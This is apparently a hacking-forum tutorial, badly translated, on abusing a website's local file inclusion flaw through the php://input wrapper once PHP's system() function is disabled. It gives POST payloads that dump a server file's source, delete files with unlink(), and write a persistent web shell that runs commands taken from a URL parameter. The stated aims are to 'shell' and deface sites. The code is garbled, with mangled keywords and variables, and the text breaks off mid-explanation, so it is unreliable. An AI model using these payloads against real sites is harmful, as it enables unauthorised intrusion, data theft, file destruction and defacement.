How to bypass the restriction of the system function

Requirements:
Site vulnerable to LFI
Shell
Php wrappers musn't be disabled
Brain (that can be usefull)
 
Introduction:
 
You found an LFI vulnerability on a website and you want to shelled it but the configuration of server doesn't allow the utilization of system, shell_exec etc.
 
Error you woshould must see:
 
Code:
PHP Warning: system () has been disabled for security reasons in/home/dir/public_html/index. php on line 374
 
So you can use/proc/self/environ method but if it doesn't work you cannot upload your shell or your deface page by system function.
Exploitation:
 
The purpose of this method will be to inject php code into the page to receive expected data from the server.
Another way to read the source:
Example of URL:
 
Code:
Http: // www.2cto.com/index. php? Page = php: // input
 
The php: // input is very important.
 
Open your hackbar and click in "Load URL" then click on "Enable Post Data" and write this in "Post Data ".
 
PHP Code:
<?
Echo "<textarea>". file_get_contents ('namefile. EXT '). "<textarea> ";
?>
 
The server will return the source code including php in textarea, I use a textarea because on some website it is very unreadable.
Another way to delete a page:
Same step that above but in "Post Data" you will write:
 
PHP Code:
<?
Unlink ('namefile. EXT ');
?>
Another way to upload your shell:
If you don't have knowledge in php it will be a little bit difficult, don't be absentminded.
 
This time in "Post Data" you will write:
 
PHP Code:
$ F = fopen ('Shell. php', 'a + ');
Fwrite ($ f, '**'); // I used fwrite because fputs was disabled
Fclose ($ f );
 
** = Some explanations is needed, so instead of ** put your code but be careful I'm sure your code contain a lot quote and you will must escape it.
So I recommended you to use an encryption that is decrypt when the php code is excuted because the encryption won't contain quote.
 
An example:
 
PHP Code:
<?
$ F = fopen ('Shell. php', 'a + ');
Fwrite ($ f, '<? Php system ($ _ GET [\ 'cmd \ ']);?> '); // I used fwrite because fputs was disabled
Fclose ($ f );
?>
 
The real code that is create on the page is:
 
PHP Code:
<? Php
System ($ _ GET ['cmd']);
?>
 
Go on page and to use the script, do like that:

So I think it's all, I hope it will be helpful and you liked it. If you don't understand something or just talk about this method PM me


From just fuck it!